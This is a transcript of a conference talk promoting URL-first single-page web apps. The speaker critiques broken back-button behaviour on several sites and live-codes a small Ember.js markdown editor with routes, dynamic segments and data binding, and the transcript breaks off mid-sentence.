This is not the brand new MacBook here. This is actually three generations old, pretty wimpy computer. But this is actually running in my browser. So let me fire up a demo. I think this is incredibly impressive. This is basically the Unreal Engine compiled and running in Firefox. And you can see it's actually running at native speeds. It's beautiful. You have this gloss, you have this reflection, and it's all inside of a browser, right? So it's not just that it's fast. It's that you inherit the entire security model of the browser. So you can basically visit a web page, download and run arbitrary code at native speed. That is a total game changer. And I think it's time, so obviously we're not all game developers, but there's a ton of stuff in this class that we can start thinking about how we're going to incorporate this into our applications. So you can check this out, unrealengine.com.slashhtml5. It's actually really new. What it's doing, Firefox is actually ahead of time compiling this JavaScript into native code that it can basically guarantee is safe. So that's pretty cool. Now I can quit Firefox and not have my MacBook Air fans go full throttle. So again, I think a lot of people, when they think about web applications, there's this notion that basically every request is going to go load a new page, right? So basically as a user interacts with your application, it's constantly hitting the server and getting HTML back in some form. Maybe it's a full page, maybe you're doing Ajax, but at the end of the day, I think most people think about the browser as mostly document viewer. And slowly over the past, I would say one or two years, more and more people have been thinking about building a single page application, right? But by and large, most web applications today, every time you move between pages, you're going to the server and you're requesting a new page. But the way that I would like you to think about your JavaScript web applications, sorry, your web applications in general, now that the browser, you can see it's actually starting to meet parity with the runtimes that you'd expect on mobile devices or on the desktop. So what I want you to start thinking about your applications is simply appear in this kind of layer where we have these different applications, maybe ones on desktop, ones on mobile. The browser is just a third platform you support and they're all consuming the same API. They're still all talking to the server using the same JSON API. Now, I say that and a lot of people object. They say, well, you know, browsers are slow. And, you know, if you want to write something like this where all the rendering and all the behavior and the logic all happens in the client, they say that's, you know, that's a JavaScript heavy application. I don't want to write a JavaScript heavy application because it would be slow and hard to manage. And my response to that is, okay, so here's on the left hand side, I have the New York Times, which is kind of like the classic, you know, you think about like, what is a web browser? How does it start? It started as these hyperlinked documents, right? And so a newspaper, I think, really captures the idea of what people think about when they think about these traditional document-oriented websites. And then on the right hand side is some forum software, open source forum software called Discourse. It's written in EmberJS on the front end and it's running Rails on the back end. 100% all of the rendering is happening in JavaScript. 
So a lot of people would think of something like this as a JavaScript heavy application. But you know, we went to look and the difference between these two, if you look on the right here is the Discourse app or on your right and then over here on the left is the Chrome inspector showing all the JavaScript assets. You can see not only are there a lot more files on the New York Times, but the raw JavaScript payload of the New York Times is 802 kilobytes compared to a heavy JavaScript app like Discourse, which is only 284. Now this is not to knock the New York Times, certainly not doing anything wrong. It's a great experience. The point that I would just like to make is websites that you visit every day are loading a lot more JavaScript than you think they are. They're doing it in a very ad hoc way, which means it starts to really add up. And basically if you want to deliver a good, compelling experience to your users, you're just going to have to end up using a lot of JavaScript. It doesn't really matter how you model it. It's going to be JavaScript no matter what. So you might as well embrace that. You might as well try to stop fighting the fact that you have JavaScript in your web applications and start trying to think, okay, well, is there a holistic model that I can use to manage all this so it happens in the same way? I'm not sprinkling JavaScript on top of my HTML until all of a sudden I have a created 800 kilobytes. So I think the most important differentiator here is not whether it's JavaScript heavy, but whether or not it's long lived or not. So on a typical document-oriented site, every time you click a link, basically everything gets thrown away and it gets rebuilt when the new page loads. But with a single-page app, these long-lived applications, thinking about how you manage state is actually really important. Now, I want to talk about URLs. URLs are really the UI of the web. And they're how we share. They're how we collaborate. And one actual nice side effect of doing server-side rendering, things like ASP.net, MVC, Ruby on Rails, even PHP is ahead of time you have to think about URLs, right? Because there's no way for your user to reach your application if you don't think about them. So especially if something like Rails, the first thing you do when you start building your application is you define your resources, which defines your URLs. But most JavaScript frameworks that are designed to build these single-page applications have actually completely forgot about these URLs. So how many of you are familiar with To Do MVC? Has anyone seen this web page before? So To Do MVC basically just re-implemented this little To Do app using all the different popular JavaScript frameworks. I think there's around two or three million of them. So they implemented this to application across all of these. But if you take a close look, this R next to each of the names of these different libraries indicates that it has routing support. What that means is that even thinking about URLs was not a consideration until later someone's like, oh, crap, you actually want to be able to share this with your friends. You want to be able to bookmark it. So I don't want you to think about routing as an afterthought. URLs are actually really critical, right? So JavaScript frameworks are treating this as something you just kind of like tack on at the end, like, okay, we built our application, now let's just sprinkle some URLs on it and call it a day. 
But in fact, if you look at real polished JavaScript heavy applications like Discourse, another example, it's forum software written in Ember. Even Facebook, which has a lot of JavaScript driving the interactions. Twitter is a good example. Basically every page on Twitter has a unique URL. The Ardio is a backbone app. All of these things have very good URL support because your users demand it. And you've probably noticed this, you've probably been using the web, you're using a lot more JavaScript stuff, you've probably had this innate feeling of like, wow, the back button is broken, refresh is broken. And a lot of people think, well, are URLs really that important? Do I really need them in my application? But here's what I want you to do. Go look at your Twitter feed. I guarantee you look at 10, look at 20 tweets in your timeline. Almost all of them are going to have URLs in them, right? Like that whole point of something like Twitter is that we want to share what we're reading and what we're doing with friends and people that we want to influence. So the URL is the UI of the web. It's basically how we collaborate. It's how we share. You know, I went to go look at my email inbox and something like 80% of the emails I looked at all contained a URL. It's a lot more pervasive than you think because you're so accustomed to it. And it's really important not to break that. The web, I think, won over native on the desktop because bookmarking, sharing, emailing, being able to command click and open a new tab, these are all very important things that you just don't have in a native experience. And I want to go a little bit farther and make a pretty bold claim, but I stand by it. If your app doesn't have URLs, you are not a web developer. A lot of people think I'm a web developer because I use HTML and CSS and JavaScript. But that doesn't matter at all. The thing that makes a web app a web app is the URL. If you don't have good URL support in your application, it's literally no different than just putting an EXE on an HTTP server and having your user download it, right? Because it's not shareable. It's impenetrable to the outside world. There's a problem, though, and that is even if you do get URLs right, if you think that URL is important, it's hard to get them right. And a lot of people say, well, you know, do I even need URLs? Even some famous screencast authors who record screencast about Angular, I'm referring to Rob Connery, who's in the audience today. I was watching his tech pub on Angular, which was really, really great. It was very well done. But then in the end, he said something that made my jaw drop. He said, you know, do you really need a URL? You should really think about it, right? You think about, does my application really need it? And if it does, then we can go in and Angular and we can add a router and add different URLs. But I would argue that the onus is on you to prove that you don't need URLs. Think about all the unusual places. Here's a couple of examples. Imagine if I want to play a game with my friend, I want to play StarCraft. Instead of logging into battle.net and finding their names, searching to see, inviting them to a group, imagine if I could just, I am them a URL when they clicked it, it just, boom, took them into a game with me. Or how about this? How many Gmail users? Any Gmail users in the audience? Okay. So imagine you and I work together and we both get an email from the accountant. 
In a couple of weeks past, of course, you have a lot of stuff in your email, your inbox, you don't see it. How many times has this happened? You get an IM from your coworker. Hey, did you see the email from the accountant? No, I didn't. Yeah, search for the title of update. And it was sometime in January, right? There's no way for me to share an email with you. You have to go through this crazy process of hoping that there's a unique subject that you can type into the search field and find it. This happens to me all the time. Imagine if instead, Google Gmail could say, oh, I see that you're both CC'd on this email, let me just generate a URL and then I can send it to you, you click on it, it takes you directly to email. The fact that you can't do that's really, really frustrating. I think another good example is in Chrome. If you've looked at the settings panel in Chrome, all of these different panels have unique URLs. So as you go around the settings in Chrome, the URL actually updates. And you might think, well, that's not actually that useful. But it turns out it is because if my dad calls me and he's like, hey, how do I reset my cookies? How do I clear my cookies in Chrome? I don't have to say, go to the Chrome menu and then, you know, go to preferences. Oh, wait, you're on Windows. Actually, it's completely different UI. So let me try to remember how you get to it in Windows. Instead, I just send him a URL, he clicks on it and takes it right to the page where he can clear his cookies. So again, I just want to reiterate, the onus is on you to prove that URLs are completely useless to your application. And I think that if you really think about it, most things, it's very important to get this right. In fact, so important, you know, I almost missed my talk today because I went to go look at the schedule. Oh, there I am, okay, 420. Let me just go look at this other link. Actually, let me go back at what happened, it's gone. The back button is busted because the agenda is a JavaScript web application that doesn't actually remember where it was. So it completely breaks the expected behavior of the browser. When I click the back button, I want to see the thing that I just looked at. So in fact, this is one of several very common error scenarios that you run into when you're browsing the web. So my buddy, Ryan Florence, who works at Instructure, been helping us out with Ember. He gave a talk where he actually identified and named several different failure scenarios where people are just not thinking about this through all the way. So I'd like to go through some of these examples with you. The first one, Ryan calls the ticket. So the ticket is, okay, I'm using this as an Angular app for finding videos. So we're going to go find this video. Oh, this is a cool video. This looks good. Let me share this with my friend. Let me grab the URL out of the URL bar as I'm used to doing here. I'll refresh a bit. Oh, damn it, it's gone. Actually, there is a way to get the URL, but you have to know the secret, you need to know the secret ticket vendor to get your ticket back to this page. Oh, here it is down at the bottom, copying link. Oh, now it works. Okay. Okay, when we know the secret incantation to get the URL, now we can get the ticket back to this page. But of course, this is not the UI of the web. The UI of the web, the thing that you're used to is going to a page, going to the address bar and copying it, bookmarking it. This ticket vendor system completely breaks the entire flow. 
This next one is called the back door. This is Pinterest, which maybe some of you use; this is actually a Backbone app. Okay, we're browsing Pinterest. Oh, I see a cool photo that I like. Awesome. Let me take this URL and send it to a friend. I'll simulate that by reloading. Actually, totally different page, completely different UI now. And now the back button is completely broken. Try to go back to where I was. Nothing works at all. You're just completely hosed. Okay, so that seems bad. Reload the page. All right. Well, that's bad. This next one, I know what you're thinking. You're like, okay, well, you know, these yahoos at Pinterest, they don't know how to build this. Surely the guys who are actually spending time thinking about JavaScript frameworks get this right all the time. Here is an excerpt from the AngularJS website. This is the Built with Angular page. We're going to go take a look at a demo app. Okay, opens a modal. Looks good. Let's refresh the page to see if sending it to a friend works. Pops up. Looks good. Oh, damn it. Looks like we have a little bit of a race condition there where some data is popping in the background after the modal has rendered, causing it to do the completely wrong thing. Do I have anyone here from a big family? Any middle children? Not the oldest. You're not the youngest. You're in the middle. It's easy to get overlooked, isn't it? You know, everyone else gets the attention and you're just kind of hanging out, minding your own business. This is 37signals Basecamp, which actually has really good URL support. It's not actually a JavaScript app. It's all rendered on the server except for the accounts page. Most people don't go here, so it didn't get as much love as the other pages. Now if we reload this page and we go back, nope. Not happening. Nope. Everything is actually completely hosed now. Someone forgot to check whether URLs worked on the accounts page because, well, who ever goes there? So now we're in this really weird state. Maybe it's going to, oh, okay, something's happening. All right. Good. Well, you can see that even if we're not doing client-side rendering, even if we're still doing a lot of server-side rendering, even just adding JavaScript on top can cause these URLs to break. Here's the last one. This is my favorite. This actually has two different names. For the Americans, this is the Tootsie Pop, as in how many licks does it take to get to the center of the Tootsie Pop? I realize that this is a reference that no one else would get. So we changed this to the Overzealous Hansel and Gretel, leaving a little bit too many breadcrumbs behind them. So this is an Angular app. This is a movie search. So basically what you can do is you can search for titles, and I think the search is like IMDB. So you'll notice that as you type the name of the movie, the URL bar actually updates. Awesome. This is great because that's what it should be doing. Except, oh, now we hit the back button, and it looks like for every character I typed there's a URL, but of course it's not updating. That's not good. Okay, okay. So that's the Hansel and Gretel. It's a little bit overzealous in leaving the breadcrumb trail behind it. So I want to be clear about something. The point of me saying this is not to bag on these people, because I've broken the back button. I've broken refresh. How many of you have written a JavaScript app? How many of you have broken the back button before? That's basically everyone. Okay. This stuff is really hard. These people aren't idiots. 
These people are really freaking smart. This stuff is really hard, and the thing that you need is basically a single code path to guarantee that if you're making changes in your application, those changes are being reflected in the URL, and if you come back through the URL, basically that same code path is followed no matter what. So I think that's basically what we've done in Ember. In the first version, we had very bad URLs, we didn't actually have any routing, and we ran into all these problems and we said, you know what, this is just not acceptable. We need to go back to square one and rethink this entire API because we're doing a very bad thing and we're helping people break URLs. So we went back to the drawing board, we had a router version two, and I think we've nailed it. We've done a lot of important work that makes you think about URLs first. Basically, URLs get put front and center. You're always thinking about them. It's actually harder to write an Ember app without URLs than it is to write one with URLs, and I think that's important. So I just want to take you guys through the process of building a small Ember app. Just before I do that, I want to go through a couple of the core key concepts that might be a little bit foreign to you, but they're actually very simple, and these are actually the things that let us do what we do in terms of URLs. So the first thing I want to share with you, these are all hand drawn by the way, you'll soon see why I am an engineer and not an artist. So the first concept is basically that templates are mapped to URLs. So basically every time you have a URL, that URL has a unique template associated with it. So in this case, we have posts. The posts URL is linked to the posts template, and the comments URL is linked to the comments template. You can see a pattern here. Now, an individual template is linked to a model. And so in your template, when you ask for a property, you basically have some kind of dynamic property, it goes and it gets that from its model. Now, you might be wondering, well, how does the template know which model is backing it? And we actually have a separate object in the system called a route. And the route is responsible for basically connecting a template to a model. It's basically a very small configuration object that says, hey, I know we have this template, and here is the JavaScript object that it should be pulling its properties from. And then lastly, and I think most importantly, this whole system, what you see right here, can be nested as deeply as possible, or sorry, as deeply as you would like. So in this example, we have a post template. And that's connected to the post model. But then inside of it, we say, well, actually, we have this different area of the template that's powered by an entirely different model. And the way that we do that is a system we call outlets. So the way to think about an outlet is simply as like a region on the screen that has a different template powered by a different model inside of it. And again, you can have as many of these inside of a template as you want. And each of those can itself have a nested outlet inside of it. So it can go as deep as you want. And then this is just showing right here this URL. Basically, the way that Ember works is it starts at the left of the URL. It gets the first chunk and says, okay, let me render this template. Okay, now that I've rendered that, let me render the next step into the parent. 
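To make that mapping concrete, here is a rough sketch of how those pieces line up in code, assuming the 2013-era Ember API used later in this talk; the posts example and the global posts variable are just stand-ins for the slide diagrams, not code shown on screen:

    // app.js
    App.Router.map(function() {
      this.resource('posts');      // the /posts URL pairs with the "posts" template
      this.resource('comments');   // the /comments URL pairs with the "comments" template
    });

    // A route is the small configuration object connecting a template to its model.
    App.PostsRoute = Ember.Route.extend({
      model: function() {
        return posts;              // whatever this returns backs the "posts" template
      }
    });

And inside a template, the {{outlet}} helper marks the region where a nested template and its own model get rendered, which is how the whole thing nests as deeply as you like.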
And so you can see that this decomposes recursively all the way down. All right, so I'm going to build a small application for you guys here. This is basically a markdown editor. Now, can you guys see this? Okay, is this text big enough? Cool. I guess I should probably open some code before I ask you if it's big enough. Okay, so this is basically the Ember.js starter kit. So if you visit ember.js.com, you'll see a link to download the starter kits, basically an HTML file with some JavaScript and all the dependencies ready to go for you. I've only made one small change here. The first is that we're using, sorry, a couple small changes. The first is that we're using a Twitter Bootstrap CSS. So it'll have a little bit nice styling built in. I'm including a markdown JavaScript library, you will see in a second why this is cool. And why it's useful. And then the last thing is I've actually just provided some fixture data here. So if I open this fixtures.js file, you'll see that I just have a global variable called files. This is an array of JavaScript objects. And then right below that I just have a loop that indexes each of those objects by ID. And in a little bit, I'll go into why this is, why this is important. Okay, let me open this up in Chrome so you guys can see. Okay. Okay, so basically we're starting from a completely blank slate. So the first thing I want to do is let's just get an application on screen. So we're not going to do anything fancy. Let's just get Ember template rendering. So the way that we do this is I'm going to go to the body tag here in my HTML. And I'm going to create a new script tag. And the type is text slash x handlebars that basically just tells the browser, hey, don't treat this as JavaScript. And then let's just put a header inside of it. Okay. Now we need to tell, we need to basically tell Ember, hey, I want you to take control of this page and I want you to start rendering templates. So the one last thing that we have to do just to get this template on screen is if I switch to our app.js file, I just have to create an instance of an application. And typically that's assigned to a global variable. So I'll just say like window.app equals ember.application.create. And now if we reload this page, you can see that without us writing any code other than creating this application, it automatically went, found this first handlebars template and rendered it to the screen. Okay. So that's cool but obviously not super impressive. So the next step is let's make stuff a little bit dynamic. Now I know one complaint people have about backbone is they're like, you know, if I want to take some value over here and move it over here, I have to write all this imperative code. But Ember like Angular makes it really easy to bind two values together in the DOM without having to write any code. So let's take a look at what that looks like. How many people here have used either Angular or Knockout? Okay. Awesome. So the thing I'm going to show you is going to look fairly similar. The most important thing to realize here is that instead of us using attributes and elements to indicate binding, we actually replace basically the brackets from HTML with double curlies. And that's basically what you're going to look for instead of looking for ng- or one of the knockout bindings. Just look for curlies instead of brackets to indicate that it's bound. So the first thing I'm going to do here is I'm going to say markdown files by name. 
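A minimal sketch of what is on disk at this point, assuming the starter-kit layout the talk describes; the header text is a guess, since the transcript only says a header goes inside the script tag:

    <!-- index.html: the type attribute keeps the browser from running this as JavaScript -->
    <script type="text/x-handlebars">
      <h1>Markdown files</h1>
    </script>

    // app.js: creating the application is all it takes for Ember to find and render the template
    window.App = Ember.Application.create();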
If we don't specify a model, Ember will actually create an empty object for us for the model. So we'll rely on that behavior for just a second. And then I'm just going to make a text field that we can bind to. So I'm going to say this is basically an input tag with type of text. And the value I'm going to bind to the name property. So it's basically the same thing that we saw right down below. So we have name here and we have name here. So these values are now bound together. So now if I refresh the page, I should be able to put my name in here. And you can see as I type, it's actually live updating without having to write any code. So I think this is pretty neat. Okay. So that's pretty interesting, but obviously I just spent a lot of time talking up URLs and so far all we've seen is two elements talking to each other. So I think the point of me demonstrating this is just to show you, like, hey, this data binding thing, it's very easy, it's very simple, this is what all the other frameworks have. So we're competitive, it's just as easy, but I'm about to show you what the real magic lies. So the first thing that I want to do on our application is actually show a list of files. So this is basically a markdown editor. And in our markdown editor, we're just going to have a list of these files. They're basically blog posts. So there's like a title and then a body. So the first thing I do when I'm defining a feature in an Ember application is to think, okay, what is the URL that's going to be associated with this? So basically what I want to happen is that if the user comes in and they visit slash files, I want to show them a list of the files that they have in their system. And just as a reminder in our fixtures.js file, this is basically the list of files that we want to display. So how do we do this? Well, the first thing is we're going to create a router. And if you're familiar with server side MVC, this should look fairly familiar to you. It's basically a way of defining these URLs. So we'll say app.router.map and this takes a function. And we'll say this.resource files. Now, let me fix my typo. So this is not a lot of code, but it's actually doing a lot of stuff under the hood. The most important of which is that if we go back to our index.html file, we can now create a script tag. So we'll say script type text x handlebars. And we're going to give this template the same name as we did in our router. Let me open that up so you can see it side by side. So over here we have our file's resource. We're just going to create another script tag and we're going to give it the ID of files. And then inside of here, let's just put a just a placeholder value for right now just so that we can see that it's working. Okay, so now if I go and refresh the page in Chrome, nothing's going to show up. Do you know why? Well, the immediate answer is that we haven't actually visited the URL that we just defined. So just because I don't have a server running, I'm going to use a hash URL, but obviously in production if you were using a more modern browser, you'd use the push state API. So visit slash files. And still nothing happens. So the reason for this is that if you recall from the slideshow, we have this concept called an outlet. So an outlet again is just a placeholder in the DOM that another template gets rendered into. And we haven't yet told ember, okay, you're rendering this files template, where does it actually get rendered into? 
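Roughly what the template and router look like after this step; whether the demo used the {{input}} helper or a bound input tag isn't visible in the transcript, so the helper form is an assumption:

    <!-- index.html -->
    <script type="text/x-handlebars">
      <h1>Markdown files by {{name}}</h1>
      {{input type="text" value=name}}  <!-- typing here live-updates {{name}} above -->
    </script>

    <!-- the template paired with the /files URL; just a placeholder for now -->
    <script type="text/x-handlebars" id="files">
      Files go here
    </script>

    // app.js
    App.Router.map(function() {
      this.resource('files');   // defines the /files URL
    });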
So to do that, I'm just going to go back to my HTML file and in this initial template that we defined, I'm just going to put a outlet and we do that just curly, curly outlets as a basically a handlebars helper. Now if we go to Chrome and refresh, you can see, let me make this a little bit bigger, you can see that it's now rendering the files template into here. And if we hit the back button, you can see it goes away, we go forward, and it's rendering, right? So does that make sense? Basically we define this URL, and it's automatically rendering the template of the same name when we visit that into the outlet. So that's cool, but obviously this is not really dynamic, right? What we have is an array of blog posts, of markdown files that we want to render a list of. So if you recall, I said that a template gets its model assigned to it by this route object. Now instead of writing a bunch of imperative code that stitches all these objects together, we just rely on the fact that if you want to have a understandable application, you typically want to name things that are related the same. So if we have a resource named files, and we have a template named files, you can guess that if we have a route object named files, then it will basically be the configuration for those two things, and that allows us to not write a lot of imperative code. So we'll say app.files route equals ember.route.extend. So we're basically just defining a very small object here, and this object has a hook on it called model. This is just a function that gets invoked when the template needs a model, and any value that you return to this will be passed into the template. So if you recall, I have this global called files, I'm just going to return that from the model hook. Now in the interest of time, I have prepared a handlebars template that we're actually going to use for this. So let me replace this placeholder, and I'll just paste this in here. And just to walk you through what's going on, we basically have a div. This is like pretty standard HTML marked up annotated to be styled by Twitter Bootstrap. And the most important thing here is that we have a table, we have a TR, and then we use this each helper. So this is a helper that's built in the handlebars that basically says for each item in an array, loop over it and repeat the contents inside. So in this case, we have a TR element that's linked over. Let me just delete this link too, because that's going to blow up. So basically we're saying loop over all of the files that are in the model, which is an array, and print the title, and then print the author. Okay, now if we refresh, okay, awesome, it's actually working. So basically we have this files array, we're returning that from the model hook, and now this pound each is letting us loop over it and repeat a TR for each item that's inside of it. And again, that URL is staying updated. If we click the back button, you can see it goes away, we click forward, it shows up, we click refresh, everything works as we would expect. So this is actually awesome so far. But now what we want to do is we want to generate some dynamic links, right? We want to be able to click any of these files and see them show up. So let me go back to my router. So instead of saying files, I'll say the singular file. So we'll say this.resource file. And just as a reminder, this is basically saying I want a URL that's slash file. And now you're probably noticing a pattern here. I'll create a script tag. I'll give this an ID of file singular. 
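Putting the last few steps together before the new singular file resource gets tried out below, a sketch of the outlet, the route, and the loop; the Bootstrap markup and the "file in controller" iteration style are reconstructions, not code read from the screen:

    <!-- index.html: the files template renders into this placeholder -->
    <script type="text/x-handlebars">
      <h1>Markdown files by {{name}}</h1>
      {{outlet}}
    </script>

    <script type="text/x-handlebars" id="files">
      <table class="table">
        {{#each file in controller}}
          <tr><td>{{file.title}}</td><td>{{file.author}}</td></tr>
        {{/each}}
      </table>
    </script>

    // app.js: the names line up -- the 'files' resource, the "files" template, FilesRoute
    App.FilesRoute = Ember.Route.extend({
      model: function() {
        return files;   // the global fixture array from fixtures.js
      }
    });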
And let's just see if this works. Okay, so now if we go back to our app, we refresh the page. So here's files. And if we type in file here manually, you can see that it replaces that outlet. It's basically taking out the old template and the old model and putting in the new template and the new model. And again, if I, the back button refresh, this all works exactly as we expect. Everything is not broken, which is actually an improvement over what we've got today. Okay, so how, so obviously the user doesn't want to type in all this stuff manually in the URL. How do we actually link, how do we turn these items into links? And remember the way that we do that is we can use this link to helper. So let me go into my HTML. And I basically want to say, okay, so I have these TRs and TDs, and I have the title on the author, let me wrap this in a link. So again, I'll use the link to helper. And I'll say basically link to file. And now if I refresh the page, you can see it's turned these into links. And if I hover over it, I know it's kind of hard to see it's kind of small over here. But it's actually linking to that file template. So if I click on file, you can see it's replaced. And I can hit the back button and things are working now. But the problem is, of course, that these are all different objects. And typically the way that we disambiguate between objects in our URLs is we give them an ID. Now if we go back and look at our fixture data, you'll actually see that these exist. If we look at the fixtures, here is the ID. The first one is Rails is omakase, and the second one is yruby. So these are not numeric IDs that you might be used to. These are string IDs, but the point holds. So how do we tell, okay, when you click on this link, don't just link to the file template. You also need to provide a little bit of information about which model it's going to be displaying. And the way that we do that is there's an optional second parameter you can pass to resource, which defines the path. So this actually supports a dynamic segment, which you may be familiar with, which is basically just a placeholder that gets filled in with whatever the ID of the model that it should be basically pairing the template and the model together with. So we'll say this will be slash file, and then colon file underscore ID. Okay, so now we have this dynamic segment, but there's a problem, which is that when we reload the page, everything breaks. But if you look at the error message, it's basically saying, hey, you're trying to call ID on an object that you haven't defined. Basically, we're trying to link to these, link to this template that's expecting to have a dynamic segment, basically a model ID associated with it, but we haven't actually told it which model it should put into the URL. So let's go back to our link to helper and basically put in a reference. So we're basically saying, okay, in this link to link to the file template, but the model that you should pass in is this file that you have in the list, right? So we're basically saying each file, and we're passing that in as the as the argument here. Now if we reload the page, let me close the debugger, if I hover over this, it's actually doing exactly what we want it now. This is pretty cool. So all we did was say, this resource has a URL with a dynamic segment in it, and then we link to it, not with by having to manually create the URLs ourselves, we simply pass in the model as the argument to link to, and it will automatically go generate this URL for us. 
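A sketch of the dynamic segment and the link-to call described here; depending on the exact Ember release from that spring, the helper may be spelled {{#linkTo}} rather than {{#link-to}}:

    // app.js
    App.Router.map(function() {
      this.resource('files');
      this.resource('file', { path: '/file/:file_id' });  // :file_id is the dynamic segment
    });

    <!-- in the files template: pass the model itself to link-to and Ember
         fills in :file_id from its id property -->
    {{#each file in controller}}
      <tr>
        <td>{{#link-to 'file' file}}{{file.title}}{{/link-to}}</td>
        <td>{{file.author}}</td>
      </tr>
    {{/each}}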
So if I command click this, you can actually see that the URL is correct. This is slash file slash the ID, in this case rails-is-omakase. And if we do the same thing with the second one, if we command click it, it's actually filling in the ID for the second object for us automatically. So I think this is pretty cool. We didn't have to write any code to go extract the ID from the object; basically just having a property called ID told Ember to do this for us automatically. So let me bring in, again in the interest of time, a pre-populated template that I'm going to be using for the file template. So let me replace again this placeholder. And so basically what we're saying here is when you visit the slash file URL, display the post title, author, and then the contents inside of it. So now if we look at the files, we refresh the page. If we click on Rails is Omakase, you can see, okay, it's doing the right thing. So basically it's passing in the model. And now it's replacing the old files template with the file template, and it's getting the appropriate data from the model. So this is our first blog post. And if we go back, you can see the back button is still working. And then if we click on the second one, you can see that it's replaced the content. So basically the same template, but now backed by a different model. Okay. Unfortunately, I have a little bit of bad news for you. And the bad news is that I have done the bad thing, which is that if I refresh this page, it's busted. Well, why didn't this work? The reason it didn't work is that before we already had the model in memory, right? We were looping over it. So we knew exactly which model was associated with that link when you clicked on it. But of course, if you're coming in from a URL, we need to somehow turn that URL into a model. The good news is that fixing this is very, very simple. So let me just go back into our router. Now, just as a reminder, the route is the object that tells the template which model it should be backed by. In this case, we have a file route, but we are without a model. So I'll just say app.file route again, this is the singular, these are all stitched together by their names. So I'll say ember.route.extend. And then here in the model hook, I actually get an argument to the model hook that I didn't need before because it was always the same model. But if the model varies, that is, it has a dynamic segment associated with it, I get this params hash. So what I can do now is I can say, if you recall, I actually have these models indexed by ID. So in our dynamic segment, you can see we have this argument called file underscore ID. That will actually be one of the arguments passed in to the model function. So I'll just say var ID equals params.file ID. And then from that files hash, I'll say return files ID. So again, this is just a little model hook that's taking the URL and telling Ember, how do you turn this unique ID into a JavaScript object? So that's all it's doing. And now if we refresh the page, hey, look at that. It works. So very, very little code. And now we have awesome URL support with dynamic segments. And of course, the back button still works. Go forward, go back, click on this, go back, command click, opens a new tab. Everything works as we expect. So we're not losing anything that we would be used to having with a server. Of course, it's very, very fast and we don't need to round trip over a high latency connection. Okay. So that's pretty awesome. 
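The model hook just described, as a sketch; it relies on fixtures.js having indexed the same files collection by id, which is what the talk set up at the start:

    // app.js: turn a URL visited directly (refresh, shared link) back into a model
    App.FileRoute = Ember.Route.extend({
      model: function(params) {
        var id = params.file_id;  // named after the dynamic segment in the router
        return files[id];         // string-keyed lookup into the indexed fixture data
      }
    });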
However, there is a small problem which is that I'm looking here and I'm noticing this is actually marked down. This isn't HTML. And it would be nice if instead of making my user read these weird characters if I could actually turn mark down into HTML for them. So this is where that little library that I included called showdown comes into play. So what we can do is register a small little handlebars helper that will convert any value passing your template into another value. So this is basically a function that gets executed. So let's define a handlebars helper called markdown that will take a string of markdown and return the HTML. So I'll say ember dot handlebars dot helper markdown. Let me close this other page so you can see this function. And this will take a value. And then just the API for using the markdown, sorry, the showdown library is we create a converter. And then we'll just return the converter dot make HTML value. Okay. Now if I go and refresh the page, so the first thing I need to do is go back to my template and tell it instead of just outputting the contents directory, sorry, directly, use this new helper that we've just defined. So we'll say markdown. And now if we go and refresh the page, well, it's getting there. We're actually seeing the HTML, but handlebars built in tries to prevent cross site scripting attacks. So it will actually escape anything you return from a handlebars helper so you don't accidentally take user provided content and emit something that is dangerous. But in this case, basically what we want to say is hey, we're going to take responsibility for doing any escaping and sanitizing. So the API for this is to just wrap in our helper. Instead of returning this string value directly, we just wrap this we say return new handlebars dot save string if anyone's used to handlebars before another project, this is exactly the same. And this basically says hey, I'm opting out of cross site scripting protection, so basically it's on you as a developer at this point to make sure that nothing bad happens. Okay, now if we refresh, you can see that it's okay, cool, awesome. We've got our link, it's now properly formatted as HTML. But let's go ahead and edit this now. Because having an editor, basically having a list that only read only is pretty boring. So I'm just going to grab a button here. Now so far we've talked about templates, we've talked about models, and we've talked about routes. But Ember is an MVC framework, so you might be wondering okay, what point do controllers come in here? And the role of a controller in our system is basically to handle events that originate from the view, from the template. So that's what we're going to do right now. Let me just grab this prepared statement. Okay, so we'll go into our index.exe and go into our index.html. And basically when we're looking at a particular file, what we want to do is we'll say basically if we're in editing mode, have a button that sends the done action, otherwise have a button that sends the edit action. And then you're probably noticing a trend here that all of these things are wired together because of the fact that they share a name. So we'll create a controller that's connected to the file template by saying app.file controller. Okay, and then we can just handle events by implementing a method essentially with the same name as the event. So over here we have a button that says if it's not editing, it'll send the edit event. So we'll just implement a method on our controller called edit. 
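A sketch of the helper as described, using the old Showdown API the demo appears to rely on (new Showdown.converter and makeHtml); the property name contents comes from the template mentioned a moment ago:

    // app.js: a bound helper that converts a markdown string to HTML
    Ember.Handlebars.helper('markdown', function(value) {
      var converter = new Showdown.converter();
      var html = converter.makeHtml(value || '');
      // SafeString opts out of Handlebars' automatic escaping --
      // sanitizing the output becomes your responsibility
      return new Handlebars.SafeString(html);
    });

    <!-- in the file template -->
    {{markdown contents}}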
So again, this is just a standard JavaScript object. It's just a method on this object. And we'll just toggle, we'll say set is editing to true. And then while we're here, we'll just go ahead and make the done event like we had. And this again is just a function that we'll get called when we send the done event. And this one we'll basically turn editing off. Okay, so now we've got our edit button. And we can click this, you can see that we're toggling basically. So we click edit, it switches is editing to true, it changes the button, we click it again, and it toggles it back. So let's just add an editing UI here. So again, I've got a template prepared. So let me open this up. And this is actually something called a partial. If you're familiar with templates, you may have heard the term partial before. This is basically just a template that you can reuse in multiple places. So I'm going to paste this in and just by convention, our template, sorry, our partials end with an underscore. And we can include the partial in our file template by using the partial helper. Come in here and say partial file slash form. And this basically says just take this partial form and include it where we call the partial helper. And now if we reload the page and click edit, now you can see that we have our editing UI. But what's really cool about this and where you start to see the shine over something like a traditional server side MVC framework is the fact that this is all live. And the handlebars template that we defined is all bound. So I can actually come in here. And I can start typing markdown. And it's going to in real time, basically as this underlying property changes, recompute the markdown and re render it. And that's very, very little code. Okay. And then we click done, you can see it toggles it and it keeps that basically keeps the change that we made. So awesome. So what have we done? We have a list of files we can we can go back to. We can click on it, we can edit it. As we edit it changes are are highlighted below. Automatically, we can refresh, we can command click basically six behaves exactly as we want it to. And we have only written 34 lines of code. I think that's pretty cool. Now there's just one last thing that I want to show you that I think is what makes Ember really shine. And that is the fact that if your design team comes to you and they have a really cool design they want you to implement, a lot of JavaScript frameworks fall down, especially if you have to have URL support. So let me give you an example. Let's imagine that we are looking at our list of files. And what our design team says actually instead of replacing this when you click on a link, instead of what we want is to keep the list on the left hand side but when you click show it over on the right. Now this would be something that would be very challenging to implement in a lot of frameworks but in Ember it's a couple lines of code. Let me show you how. All we have to do is go to our router and this is something we're going to call a nested resource. This is basically a resource that lives inside of its parent. So in this case we have a file that will live inside of this file's resource. So the way that we do this is we can pass a function as 